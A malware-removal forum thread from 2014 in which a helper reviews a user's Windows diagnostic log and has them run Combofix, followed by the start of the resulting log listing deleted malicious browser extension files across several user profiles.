AlternateDataStreams: C:\ProgramData\Temp:ADFAD95A
AlternateDataStreams: C:\ProgramData\Temp:B1FBBD09
AlternateDataStreams: C:\ProgramData\Temp:CAF8DAC8
AlternateDataStreams: C:\ProgramData\Temp:CB959782
AlternateDataStreams: C:\ProgramData\Temp:CBAF0C30
AlternateDataStreams: C:\ProgramData\Temp:D8A1AC56
AlternateDataStreams: C:\ProgramData\Temp:E1D06077
AlternateDataStreams: C:\ProgramData\Temp:EA2D3047
AlternateDataStreams: C:\ProgramData\Temp:F6CDA594
AlternateDataStreams: C:\ProgramData\Temp:FD11E093

==================== Safe Mode (whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)


==================== EXE Association (whitelisted) =============

(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)


==================== MSCONFIG/TASK MANAGER disabled items =========

(Currently there is no automatic fix for this section.)

MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^McAfee Security Scan Plus.lnk => C:\Windows\pss\McAfee Security Scan Plus.lnk.CommonStartup
MSCONFIG\startupfolder: C:^Users^Ice^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^CurseClientStartup.ccip => C:\Windows\pss\CurseClientStartup.ccip.Startup
MSCONFIG\startupreg: AccuWeatherWidget => "C:\Program Files (x86)\Dell Stage\Dell Stage\AccuWeather\accuweather.exe" "C:\Program Files (x86)\Dell Stage\Dell Stage\AccuWeather\start.umj" --startup
MSCONFIG\startupreg: Adobe ARM => "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
MSCONFIG\startupreg: APSDaemon => "C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe"
MSCONFIG\startupreg: DellStage => "C:\Program Files (x86)\Dell Stage\Dell Stage\stage_primary.exe" "C:\Program Files (x86)\Dell Stage\Dell Stage\start.umj" --startup
MSCONFIG\startupreg: IAStorIcon => C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe
MSCONFIG\startupreg: iTunesHelper => "C:\Program Files (x86)\iTunes\iTunesHelper.exe"
MSCONFIG\startupreg: OutfoxTV => C:\Program Files\OutfoxTV\OutfoxTV\DesktopContainer.exe
MSCONFIG\startupreg: Raptr => C:\PROGRA~2\Raptr\raptrstub.exe --startup
MSCONFIG\startupreg: RtHDVCpl => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe -s
MSCONFIG\startupreg: RunDLLEntry_EptMon => C:\Windows\system32\RunDLL32.exe C:\Windows\system32\EptMon64.dll,RunDLLEntry EptMon64
MSCONFIG\startupreg: RunDLLEntry_THXCfg => C:\Windows\system32\RunDLL32.exe C:\Windows\system32\THXCfg64.dll,RunDLLEntry THXCfg64
MSCONFIG\startupreg: Sidebar => C:\Program Files\Windows Sidebar\sidebar.exe /autoRun
MSCONFIG\startupreg: StartCCC => "C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\amd64\CLIStart.exe" MSRun
MSCONFIG\startupreg: THX Audio Control Panel => "C:\Program Files (x86)\Creative\THX TruStudio PC\THXAudioCP\THXAudio.exe" /r
MSCONFIG\startupreg: UpdReg => C:\Windows\UpdReg.EXE

==================== Faulty Device Manager Devices =============


==================== Event log errors: =========================

Application errors:
==================
Error: (08/03/2014 03:18:15 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (08/03/2014 03:08:48 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (08/02/2014 11:32:14 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (08/02/2014 11:21:52 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (08/02/2014 11:03:35 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (08/02/2014 10:20:17 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003


System errors:
=============
Error: (08/03/2014 03:18:40 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Google Update Service (gupdate) service failed to start due to the following error:
%%2

Error: (08/03/2014 03:17:35 AM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

Error: (08/03/2014 03:17:11 AM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Peer Networking Grouping service depends on the Peer Name Resolution Protocol service which failed to start because of the following error:
%%-2140993535

Error: (08/03/2014 03:17:11 AM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: The Peer Name Resolution Protocol service terminated with the following error:
%%-2140993535

Error: (08/03/2014 03:17:11 AM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Peer Networking Grouping service depends on the Peer Name Resolution Protocol service which failed to start because of the following error:
%%-2140993535

Error: (08/03/2014 03:17:11 AM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: The Peer Name Resolution Protocol service terminated with the following error:
%%-2140993535

Error: (08/03/2014 03:17:11 AM) (Source: PNRPSvc) (EventID: 102) (User: )
Description: 0x80630801

Error: (08/03/2014 03:17:11 AM) (Source: PNRPSvc) (EventID: 102) (User: )
Description: 0x80630801

Error: (08/03/2014 03:17:00 AM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Peer Networking Grouping service depends on the Peer Name Resolution Protocol service which failed to start because of the following error:
%%-2140993535

Error: (08/03/2014 03:17:00 AM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: The Peer Name Resolution Protocol service terminated with the following error:
%%-2140993535


Microsoft Office Sessions:
=========================
Error: (08/03/2014 03:18:15 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (08/03/2014 03:08:48 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (08/02/2014 11:32:14 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (08/02/2014 11:21:52 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (08/02/2014 11:03:35 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (08/02/2014 10:20:17 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003


==================== Memory info ===========================

Percentage of memory in use: 20%
Total physical RAM: 12278.93 MB
Available physical RAM: 9798.65 MB
Total Pagefile: 24556.05 MB
Available Pagefile: 22065.13 MB
Total Virtual: 8192 MB
Available Virtual: 8191.83 MB

==================== Drives ================================

Drive c: (OS) (Fixed) (Total:918.22 GB) (Free:688.51 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 932 GB) (Disk ID: CB59CF0B)
Partition 1: (Not Active) - (Size=39 MB) - (Type=DE)
Partition 2: (Active) - (Size=13 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=918 GB) - (Type=07 NTFS)

==================== End Of Log ============================



#4 aharonov

aharonov

  • Malware Response Team
  • 2,441 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:10:43 PM

Posted 03 August 2014 - 04:49 AM

It's indeed the infection I suspected.


Please download Combofix (by sUBs) and save it to your Desktop.
  • Disable the realtime-protection of your antivirus and anti-malware programs because they might interfere with the scan.
  • Start Combofix.exe and follow its instructions.
  • Do not use the computer while the scan is running. This may cause the program to stall.
  • When finished, a log file will be displayed (that can also be found at C:\Combofix.txt).
    Please copy and paste the contents of this file into your next post.
Note: If you receive an error "Illegal operation attempted on a registry key that has been marked for deletion." after the scan, just restart the computer.
(You can find more detailed instructions in this guide on using Combofix.)

#5 icelore

icelore
  • Topic Starter

  • Members
  • 5 posts
  • OFFLINE
  •  
  • Local time:03:43 PM

Posted 03 August 2014 - 05:13 AM

It's indeed the infection I suspected.

I'm not sure if that's a good thing or a bad thing...  lol

 

Here's the Combofix info:

 

 

ComboFix 14-08-02.02 - Ice 08/03/2014   5:00.1.8 - x64
Microsoft Windows 7 Home Premium   6.1.7601.1.1252.1.1033.18.12279.9733 [GMT -5:00]
Running from: c:\users\Ice\Desktop\ComboFix.exe
SP: Windows Defender *Enabled/Outdated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
.
(((((((((((((((((((((((((((((((((((((((   Other Deletions   )))))))))))))))))))))))))))))))))))))))))))))))))
.
.
C:\Install.exe
c:\users\Administrator\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\gjjbhbocgghegbmkmejgmgkbhbndofef
c:\users\Administrator\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\gjjbhbocgghegbmkmejgmgkbhbndofef\1.0\background.html
c:\users\Administrator\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\gjjbhbocgghegbmkmejgmgkbhbndofef\1.0\content.js
c:\users\Administrator\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\gjjbhbocgghegbmkmejgmgkbhbndofef\1.0\KjTlp.js
c:\users\Administrator\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\gjjbhbocgghegbmkmejgmgkbhbndofef\1.0\lsdb.js
c:\users\Administrator\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\gjjbhbocgghegbmkmejgmgkbhbndofef\1.0\manifest.json
c:\users\Administrator\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\ljjmgghhemmfepeeipoeiedoddjkehne
c:\users\Administrator\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\ljjmgghhemmfepeeipoeiedoddjkehne\1.0\background.html
c:\users\Administrator\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\ljjmgghhemmfepeeipoeiedoddjkehne\1.0\content.js
c:\users\Administrator\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\ljjmgghhemmfepeeipoeiedoddjkehne\1.0\d09k7n.js
c:\users\Administrator\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\ljjmgghhemmfepeeipoeiedoddjkehne\1.0\lsdb.js
c:\users\Administrator\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\ljjmgghhemmfepeeipoeiedoddjkehne\1.0\manifest.json
c:\users\Administrator\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\gjjbhbocgghegbmkmejgmgkbhbndofef
c:\users\Administrator\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\gjjbhbocgghegbmkmejgmgkbhbndofef\1.0\background.html
c:\users\Administrator\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\gjjbhbocgghegbmkmejgmgkbhbndofef\1.0\content.js
c:\users\Administrator\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\gjjbhbocgghegbmkmejgmgkbhbndofef\1.0\KjTlp.js
c:\users\Administrator\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\gjjbhbocgghegbmkmejgmgkbhbndofef\1.0\lsdb.js
c:\users\Administrator\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\gjjbhbocgghegbmkmejgmgkbhbndofef\1.0\manifest.json
c:\users\Administrator\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\ljjmgghhemmfepeeipoeiedoddjkehne
c:\users\Administrator\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\ljjmgghhemmfepeeipoeiedoddjkehne\1.0\background.html
c:\users\Administrator\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\ljjmgghhemmfepeeipoeiedoddjkehne\1.0\content.js
c:\users\Administrator\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\ljjmgghhemmfepeeipoeiedoddjkehne\1.0\d09k7n.js
c:\users\Administrator\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\ljjmgghhemmfepeeipoeiedoddjkehne\1.0\lsdb.js
c:\users\Administrator\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\ljjmgghhemmfepeeipoeiedoddjkehne\1.0\manifest.json
c:\users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Extensions\gjjbhbocgghegbmkmejgmgkbhbndofef
c:\users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Extensions\gjjbhbocgghegbmkmejgmgkbhbndofef\1.0\background.html
c:\users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Extensions\gjjbhbocgghegbmkmejgmgkbhbndofef\1.0\content.js
c:\users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Extensions\gjjbhbocgghegbmkmejgmgkbhbndofef\1.0\KjTlp.js
c:\users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Extensions\gjjbhbocgghegbmkmejgmgkbhbndofef\1.0\lsdb.js
c:\users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Extensions\gjjbhbocgghegbmkmejgmgkbhbndofef\1.0\manifest.json
c:\users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Extensions\ljjmgghhemmfepeeipoeiedoddjkehne
c:\users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Extensions\ljjmgghhemmfepeeipoeiedoddjkehne\1.0\background.html
c:\users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Extensions\ljjmgghhemmfepeeipoeiedoddjkehne\1.0\content.js
c:\users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Extensions\ljjmgghhemmfepeeipoeiedoddjkehne\1.0\d09k7n.js
c:\users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Extensions\ljjmgghhemmfepeeipoeiedoddjkehne\1.0\lsdb.js
c:\users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Extensions\ljjmgghhemmfepeeipoeiedoddjkehne\1.0\manifest.json
c:\users\Guest\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\gjjbhbocgghegbmkmejgmgkbhbndofef
c:\users\Guest\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\gjjbhbocgghegbmkmejgmgkbhbndofef\1.0\background.html
c:\users\Guest\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\gjjbhbocgghegbmkmejgmgkbhbndofef\1.0\content.js
c:\users\Guest\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\gjjbhbocgghegbmkmejgmgkbhbndofef\1.0\KjTlp.js
c:\users\Guest\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\gjjbhbocgghegbmkmejgmgkbhbndofef\1.0\lsdb.js
c:\users\Guest\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\gjjbhbocgghegbmkmejgmgkbhbndofef\1.0\manifest.json
c:\users\Guest\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\ljjmgghhemmfepeeipoeiedoddjkehne
c:\users\Guest\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\ljjmgghhemmfepeeipoeiedoddjkehne\1.0\background.html
c:\users\Guest\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\ljjmgghhemmfepeeipoeiedoddjkehne\1.0\content.js
c:\users\Guest\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\ljjmgghhemmfepeeipoeiedoddjkehne\1.0\d09k7n.js
c:\users\Guest\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\ljjmgghhemmfepeeipoeiedoddjkehne\1.0\lsdb.js
c:\users\Guest\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\ljjmgghhemmfepeeipoeiedoddjkehne\1.0\manifest.json
c:\users\Guest\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\gjjbhbocgghegbmkmejgmgkbhbndofef
c:\users\Guest\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\gjjbhbocgghegbmkmejgmgkbhbndofef\1.0\background.html
c:\users\Guest\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\gjjbhbocgghegbmkmejgmgkbhbndofef\1.0\content.js
c:\users\Guest\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\gjjbhbocgghegbmkmejgmgkbhbndofef\1.0\KjTlp.js
c:\users\Guest\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\gjjbhbocgghegbmkmejgmgkbhbndofef\1.0\lsdb.js
c:\users\Guest\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\gjjbhbocgghegbmkmejgmgkbhbndofef\1.0\manifest.json
c:\users\Guest\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\ljjmgghhemmfepeeipoeiedoddjkehne
c:\users\Guest\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\ljjmgghhemmfepeeipoeiedoddjkehne\1.0\background.html
c:\users\Guest\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\ljjmgghhemmfepeeipoeiedoddjkehne\1.0\content.js
c:\users\Guest\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\ljjmgghhemmfepeeipoeiedoddjkehne\1.0\d09k7n.js
c:\users\Guest\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\ljjmgghhemmfepeeipoeiedoddjkehne\1.0\lsdb.js
c:\users\Guest\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\ljjmgghhemmfepeeipoeiedoddjkehne\1.0\manifest.json
c:\users\Guest\AppData\Local\Google\Chrome\User Data\Default\Extensions\gjjbhbocgghegbmkmejgmgkbhbndofef
c:\users\Guest\AppData\Local\Google\Chrome\User Data\Default\Extensions\gjjbhbocgghegbmkmejgmgkbhbndofef\1.0\background.html
c:\users\Guest\AppData\Local\Google\Chrome\User Data\Default\Extensions\gjjbhbocgghegbmkmejgmgkbhbndofef\1.0\content.js
c:\users\Guest\AppData\Local\Google\Chrome\User Data\Default\Extensions\gjjbhbocgghegbmkmejgmgkbhbndofef\1.0\KjTlp.js
c:\users\Guest\AppData\Local\Google\Chrome\User Data\Default\Extensions\gjjbhbocgghegbmkmejgmgkbhbndofef\1.0\lsdb.js
c:\users\Guest\AppData\Local\Google\Chrome\User Data\Default\Extensions\gjjbhbocgghegbmkmejgmgkbhbndofef\1.0\manifest.json
c:\users\Guest\AppData\Local\Google\Chrome\User Data\Default\Extensions\ljjmgghhemmfepeeipoeiedoddjkehne
c:\users\Guest\AppData\Local\Google\Chrome\User Data\Default\Extensions\ljjmgghhemmfepeeipoeiedoddjkehne\1.0\background.html
c:\users\Guest\AppData\Local\Google\Chrome\User Data\Default\Extensions\ljjmgghhemmfepeeipoeiedoddjkehne\1.0\content.js
c:\users\Guest\AppData\Local\Google\Chrome\User Data\Default\Extensions\ljjmgghhemmfepeeipoeiedoddjkehne\1.0\d09k7n.js
c:\users\Guest\AppData\Local\Google\Chrome\User Data\Default\Extensions\ljjmgghhemmfepeeipoeiedoddjkehne\1.0\lsdb.js
c:\users\Guest\AppData\Local\Google\Chrome\User Data\Default\Extensions\ljjmgghhemmfepeeipoeiedoddjkehne\1.0\manifest.json
c:\users\HomeGroupUser$\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\gjjbhbocgghegbmkmejgmgkbhbndofef
c:\users\HomeGroupUser$\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\gjjbhbocgghegbmkmejgmgkbhbndofef\1.0\background.html
c:\users\HomeGroupUser$\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\gjjbhbocgghegbmkmejgmgkbhbndofef\1.0\content.js
c:\users\HomeGroupUser$\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\gjjbhbocgghegbmkmejgmgkbhbndofef\1.0\KjTlp.js
c:\users\HomeGroupUser$\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\gjjbhbocgghegbmkmejgmgkbhbndofef\1.0\lsdb.js
c:\users\HomeGroupUser$\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\gjjbhbocgghegbmkmejgmgkbhbndofef\1.0\manifest.json
c:\users\HomeGroupUser$\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\ljjmgghhemmfepeeipoeiedoddjkehne
c:\users\HomeGroupUser$\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\ljjmgghhemmfepeeipoeiedoddjkehne\1.0\background.html
c:\users\HomeGroupUser$\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\ljjmgghhemmfepeeipoeiedoddjkehne\1.0\content.js
c:\users\HomeGroupUser$\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\ljjmgghhemmfepeeipoeiedoddjkehne\1.0\d09k7n.js
c:\users\HomeGroupUser$\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\ljjmgghhemmfepeeipoeiedoddjkehne\1.0\lsdb.js
c:\users\HomeGroupUser$\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\ljjmgghhemmfepeeipoeiedoddjkehne\1.0\manifest.json
c:\users\HomeGroupUser$\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\gjjbhbocgghegbmkmejgmgkbhbndofef
c:\users\HomeGroupUser$\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\gjjbhbocgghegbmkmejgmgkbhbndofef\1.0\background.html
c:\users\HomeGroupUser$\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\gjjbhbocgghegbmkmejgmgkbhbndofef\1.0\content.js
c:\users\HomeGroupUser$\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\gjjbhbocgghegbmkmejgmgkbhbndofef\1.0\KjTlp.js
c:\users\HomeGroupUser$\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\gjjbhbocgghegbmkmejgmgkbhbndofef\1.0\lsdb.js
c:\users\HomeGroupUser$\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\gjjbhbocgghegbmkmejgmgkbhbndofef\1.0\manifest.json
c:\users\HomeGroupUser$\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\ljjmgghhemmfepeeipoeiedoddjkehne
c:\users\HomeGroupUser$\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\ljjmgghhemmfepeeipoeiedoddjkehne\1.0\background.html
c:\users\HomeGroupUser$\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\ljjmgghhemmfepeeipoeiedoddjkehne\1.0\content.js
c:\users\HomeGroupUser$\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\ljjmgghhemmfepeeipoeiedoddjkehne\1.0\d09k7n.js
c:\users\HomeGroupUser$\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\ljjmgghhemmfepeeipoeiedoddjkehne\1.0\lsdb.js
c:\users\HomeGroupUser$\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\ljjmgghhemmfepeeipoeiedoddjkehne\1.0\manifest.json
c:\users\HomeGroupUser$\AppData\Local\Google\Chrome\User Data\Default\Extensions\gjjbhbocgghegbmkmejgmgkbhbndofef
c:\users\HomeGroupUser$\AppData\Local\Google\Chrome\User Data\Default\Extensions\gjjbhbocgghegbmkmejgmgkbhbndofef\1.0\background.html
c:\users\HomeGroupUser$\AppData\Local\Google\Chrome\User Data\Default\Extensions\gjjbhbocgghegbmkmejgmgkbhbndofef\1.0\content.js
c:\users\HomeGroupUser$\AppData\Local\Google\Chrome\User Data\Default\Extensions\gjjbhbocgghegbmkmejgmgkbhbndofef\1.0\KjTlp.js
c:\users\HomeGroupUser$\AppData\Local\Google\Chrome\User Data\Default\Extensions\gjjbhbocgghegbmkmejgmgkbhbndofef\1.0\lsdb.js
c:\users\HomeGroupUser$\AppData\Local\Google\Chrome\User Data\Default\Extensions\gjjbhbocgghegbmkmejgmgkbhbndofef\1.0\manifest.json
c:\users\HomeGroupUser$\AppData\Local\Google\Chrome\User Data\Default\Extensions\ljjmgghhemmfepeeipoeiedoddjkehne
c:\users\HomeGroupUser$\AppData\Local\Google\Chrome\User Data\Default\Extensions\ljjmgghhemmfepeeipoeiedoddjkehne\1.0\background.html
c:\users\HomeGroupUser$\AppData\Local\Google\Chrome\User Data\Default\Extensions\ljjmgghhemmfepeeipoeiedoddjkehne\1.0\content.js
c:\users\HomeGroupUser$\AppData\Local\Google\Chrome\User Data\Default\Extensions\ljjmgghhemmfepeeipoeiedoddjkehne\1.0\d09k7n.js
c:\users\HomeGroupUser$\AppData\Local\Google\Chrome\User Data\Default\Extensions\ljjmgghhemmfepeeipoeiedoddjkehne\1.0\lsdb.js
c:\users\HomeGroupUser$\AppData\Local\Google\Chrome\User Data\Default\Extensions\ljjmgghhemmfepeeipoeiedoddjkehne\1.0\manifest.json
c:\users\Ice\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\gjjbhbocgghegbmkmejgmgkbhbndofef
c:\users\Ice\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\gjjbhbocgghegbmkmejgmgkbhbndofef\1.0\background.html
c:\users\Ice\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\gjjbhbocgghegbmkmejgmgkbhbndofef\1.0\content.js
c:\users\Ice\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\gjjbhbocgghegbmkmejgmgkbhbndofef\1.0\KjTlp.js
c:\users\Ice\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\gjjbhbocgghegbmkmejgmgkbhbndofef\1.0\lsdb.js
c:\users\Ice\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\gjjbhbocgghegbmkmejgmgkbhbndofef\1.0\manifest.json
c:\users\Ice\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\ljjmgghhemmfepeeipoeiedoddjkehne
c:\users\Ice\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\ljjmgghhemmfepeeipoeiedoddjkehne\1.0\background.html
c:\users\Ice\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\ljjmgghhemmfepeeipoeiedoddjkehne\1.0\content.js
c:\users\Ice\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\ljjmgghhemmfepeeipoeiedoddjkehne\1.0\d09k7n.js
c:\users\Ice\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\ljjmgghhemmfepeeipoeiedoddjkehne\1.0\lsdb.js
c:\users\Ice\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\ljjmgghhemmfepeeipoeiedoddjkehne\1.0\manifest.json
c:\users\Ice\AppData\Local\datos.txt
c:\users\Ice\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\gjjbhbocgghegbmkmejgmgkbhbndofef
c:\users\Ice\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\gjjbhbocgghegbmkmejgmgkbhbndofef\1.0\background.html
c:\users\Ice\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\gjjbhbocgghegbmkmejgmgkbhbndofef\1.0\content.js
c:\users\Ice\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\gjjbhbocgghegbmkmejgmgkbhbndofef\1.0\KjTlp.js
c:\users\Ice\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\gjjbhbocgghegbmkmejgmgkbhbndofef\1.0\lsdb.js
c:\users\Ice\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\gjjbhbocgghegbmkmejgmgkbhbndofef\1.0\manifest.json
c:\users\Ice\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\ljjmgghhemmfepeeipoeiedoddjkehne
c:\users\Ice\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\ljjmgghhemmfepeeipoeiedoddjkehne\1.0\background.html
c:\users\Ice\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\ljjmgghhemmfepeeipoeiedoddjkehne\1.0\content.js
c:\users\Ice\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\ljjmgghhemmfepeeipoeiedoddjkehne\1.0\d09k7n.js
c:\users\Ice\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\ljjmgghhemmfepeeipoeiedoddjkehne\1.0\lsdb.js
c:\users\Ice\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\ljjmgghhemmfepeeipoeiedoddjkehne\1.0\manifest.json
c:\users\Ice\AppData\Local\Temp\_MEI29882\_ctypes.pyd
c:\users\Ice\AppData\Local\Temp\_MEI29882\_elementtree.pyd
c:\users\Ice\AppData\Local\Temp\_MEI29882\_hashlib.pyd
c:\users\Ice\AppData\Local\Temp\_MEI29882\_multiprocessing.pyd
